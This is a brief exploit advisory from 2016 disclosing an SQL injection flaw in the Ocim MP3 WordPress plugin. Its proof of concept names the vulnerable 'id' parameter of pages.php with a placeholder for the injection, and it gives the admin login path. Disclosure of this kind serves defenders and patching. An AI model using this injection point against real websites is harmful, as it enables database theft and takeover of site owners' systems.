========
Ocim MP3 Plugin SQL Injection Vulnerability
========
:----------------------------------------------------------------------------------------------------:
: # Exploit Title : Ocim MP3 Plugin SQL Injection Vulnerability
: # Date : 26 February 2016
: # Author : xevil and Blankon33
: # Vendor Site: http://www.ocimscripts.com/
: # Version:
: # Vulnerability : SQL Injection
: # Tested on : Wordpress 4.4.2
: # Severity : High
:----------------------------------------------------------------------------------------------------:
Summary
========
Ocim MP3 is Plugin to make MP3 Grabber site based on Wordpress.
Proof of Concept
========
Infected URL:
http://[Site]/[Path]/wp-content/plugins/ocim-mp3/source/pages.php?id=['SQLi]
Admin Panel:
http://[Site]/[Path]/oc-login.php
===========
Thanks to
===========
All Indonesian Hacker!!!